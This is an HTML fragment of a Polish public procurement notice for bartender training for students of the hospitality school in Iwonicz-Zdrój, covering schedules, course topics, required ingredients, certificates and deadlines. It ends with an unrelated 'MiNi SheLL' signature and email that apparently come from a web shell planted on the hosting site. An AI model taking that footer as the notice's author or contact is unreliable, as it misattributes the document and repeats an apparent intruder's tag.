12. Wykonawca wyda uczestnikom kursu dyplomy potwierdzającego ukończenie kursu 
       barmana pierwszego stopnia level A oraz zaświadczenia o ukończeniu szkolenia.
13. Termin wykonania : 31 marzec 2014 rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.51.00.00-2, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia barmańskiego dla uczniów/uczennic dla uczniów/uczennic Zespołu Szkół Gastronomiczno - Hotelarskich w Iwoniczu Zdroju.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia barmańskiego zakończonego stosownym certyfikatem oraz zaświadczeniem o ukończeniu kursu dla uczniów/uczennic  Zespołu Szkół Gastronomiczno-Hotelarskich w Iwoniczu-Zdroju w ramach realizowanego projektu pn. Podkarpacie stawia na zawodowców, dofinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki w roku szkolnym 2013/2014.
2. 	Miejsce przeprowadzenia kursu - zajęć teoretycznych i praktycznych: Zespół Szkół Gastronomiczno-Hotelarskich w Iwoniczu-Zdroju.
3.	Szkolenie zostanie przeprowadzone w formie zajęć pozalekcyjnych od poniedziałku do piątku w nw. terminie w wymiarze:
1)	20 - 24 stycznia 2014 r. - 40 godzin szkoleniowych po 45 min każda, dla 1 grupy liczącej 15 osób,
oraz od poniedziałku do soboty w nw. terminie w wymiarze:
2)	12 - 27 czerwca 2014 r. - 40 godzin szkoleniowych po 45 min każda, dla 1 grupy liczącej 15 osób,

4. 	Zajęcia będą trwać maksymalnie 5 godzin dydaktycznych dziennie, a w dniach wolnych od nauki szkolnej ustalonych zarządzeniem dyrektora szkoły tj. 20.06.2014 r. i 23.06.2014 r., podczas ferii zimowych trwających od 20.01.2014 r. do 31.01.2014 r. i w soboty - maksymalnie 8 godzin dydaktycznych dziennie.
5. 	Celem szkolenia jest dostarczenie uczestnikom umiejętności i kwalifikacji niezbędnych w branży gastronomicznej, zapoznanie z wiedzą na temat barmaństwa, przekazanie wiedzy praktycznej jak i teoretycznej oraz zachęcenie do ćwiczenia nowych umiejętności, które mogą zapewnić dalszy rozwój na rynku pracy oraz w szeroko rozumianym samokształceniu,  a także dostarczenie uczestnikom/uczestniczkom certyfikatów potwierdzających ich kwalifikacje i zaświadczeń o ukończeniu kursu.

6. 	Wykonawca przygotuje szczegółowy program szkolenia w oparciu o następujące bloki tematyczne: 
Wprowadzenie do zawodu barmana,
Zarys technologii i towaroznawstwa napojów alkoholowych i bezalkoholowych,
Podział i charakterystyka napojów mieszanych,
Technika miksowania , teoretyczne i praktyczne zastosowanie receptur,
Mieszanie napojów alkoholowych i bezalkoholowych,
Podstawy sztuki flair
7. 	Program szkolenia powinien obejmować 4 godziny zajęć teoretycznych i 36 godzin zajęć praktycznych. Każdy uczestnik powinien wykonać minimum po jednym drinku z następujących  alkoholi: wódka czysta, rum starzony, rum niestarzony, wermut słodki i wytrawny, gin klasyczny i o smaku owoców cytrusowych; likiery: blue curacao o smaku pomarańczowym i triple sec - bezbarwny, zielony banan, czarna porzeczka, whisky, koniak, wino musujące, wino białe, wino czerwone, żubrówka, wiśniówka, wódka czysta smakowa (limonka, czerwona porzeczka), tekila złota i srebrna, malibu, likier passoa, campari, adwokat, syropy bezalkoholowe.
	Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie szkolenia powinna być przeprowadzona profesjonalna degustacja.
	

8. 	Wykonawca zapewnić ma oraz przekazać każdemu uczestnikowi materiały do szkolenia barmańskiego oraz opracuje, powieli i przekaże uczestnikom szkolenia niezbędne materiały szkoleniowe z zakresu szkolenia barmańskiego. 

9. 	Wykonawca winien zapewnić na czas prowadzenia kursu urządzenia i sprzęt specjalistyczny do jego przeprowadzenia w zakresie programu szkolenia.

10. 	Nadto musi zapewnić multimedia wspomagające szkolenie (pozwalające na zbliżenie powierzchni roboczej prowadzącego szkolenie):  rzutnik 

11. 	Wykonawca zapewni każdemu uczestnikowi stosowne surowce i produkty do ćwiczeń zgodnie z programem szkolenia. 

12. Wykonawca zapewni każdemu uczestnikowi/uczestniczce szkolenia możliwość wykonania ćwiczeń praktycznych wynikających z programu szkolenia tak, aby każdy uczestnik mógł kilkakrotnie powtórzyć to samo ćwiczenie w celu utrwalenia zdobytej wiedzy i umiejętności.

13. 	Wykonawca jest zobowiązany do przesłania Zamawiającemu programu szkolenia w terminie 5 dni przed terminem rozpoczęcia zajęć celem ich akceptacji. 

14. Etap II przedmiotu zamówienia - przeprowadzenie egzaminu sprawdzającego potwierdzającego nabycie kwalifikacji w zakresie szkolenia barmańskiego dla uczestników/uczestniczek kursu, sporządzenie protokołu z egzaminu i przekazanie jego kopii Zamawiającemu oraz wydanie certyfikatów o ukończeniu szkolenia potwierdzających nabyte kwalifikacje oraz zaświadczeń o ukończeniu kursu.

15.	Odbiór wykonanej usługi zostanie udokumentowany przekazaniem Zamawiającemu szczegółowego programu szkolenia, list obecności, zapisami w dzienniku szkoleń czasu i tematyki zajęć, potwierdzeniem otrzymania przez uczestników materiałów szkoleniowych, kopii protokołu z przeprowadzonego egzaminu potwierdzającego przeprowadzenie egzaminu dla uczestników kursu oraz wydanie certyfikatów i zaświadczeń o ukończeniu kursu oraz ich uwierzytelnionych kopii, listy potwierdzającej odbiór certyfikatów i zaświadczeń o ukończeniu kursu oraz raportu końcowego z przeprowadzonego szkolenia. 

16. 	Certyfikaty w języku polskim i języku angielskim (powinny zawierać: logotyp w języku polskim i języku angielskim, nazwę projektu,  informację o współfinansowaniu, nazwę firmy szkolącej, numer certyfikatu, imię i nazwisko osoby, dla której został wystawiony, datę i miejsce urodzenia, nazwę szkolenia,  informację o kursie: miejsce szkolenia (Zespół Szkół Gastronomiczno-Hotelarskich w Iwoniczu-Zdroju),  datę szkolenia, ilość godzin, zagadnienia;  miejscowość i datę wystawienia certyfikatu, pieczątkę i podpis wykonawcy.

17. 	Szkolenie barmańskie wyposaży uczniów w dodatkowe umiejętności  - certyfikowane poszukiwane na rynku pracy.

18. Termin wykonania: 27 czerwca 2014 r.

Cechy techniczne i jakościowe przedmiotu zamówienia winny odpowiadać Polskim Normom przenoszącym europejskie normy lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.51.00.00-2, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com